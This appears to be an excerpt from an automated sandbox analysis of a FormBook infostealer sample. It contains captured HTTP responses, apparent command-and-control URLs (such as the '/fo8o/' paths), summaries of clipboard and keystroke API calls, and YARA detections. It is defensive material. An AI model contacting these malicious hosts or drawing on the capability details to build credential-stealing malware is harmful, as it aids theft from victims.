Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 08 Jun 2024 16:18:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 08 Jun 2024 16:18:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:18:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:18:24 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:18:27 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: netbtugc.exe, 00000004.00000002.4249071276.00000000057C0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004B50000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: fIuefTlcmxsHvlw.exe, 00000008.00000002.4250197386.0000000005644000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.b301.space
Source: fIuefTlcmxsHvlw.exe, 00000008.00000002.4250197386.0000000005644000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.b301.space/fo8o/
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004052000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004052000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000004FE6000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004376000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://donnavariedades.com/fo8o?aZ=l
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.4247312315.0000000003318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033?
Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000003.2114198872.0000000008065000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003A0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFx
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.4249071276.000000000530A000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.000000000469A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?aZ=mxnR
Source: netbtugc.exe, 00000004.00000002.4249071276.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003878000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs
Source: netbtugc.exe, 00000004.00000002.4249071276.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003878000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.000000000499E000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003D2E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa
Source: netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto
Source: fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003D2E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000004.00000002.4249071276.00000000057C0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004B50000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00D7425A

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D74458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00D74458
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BA4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		1_2_00BA4458

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

0_2_00D7425A

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D60219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00D60219

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D8CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00D8CDAC
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BBCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		1_2_00BBCDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
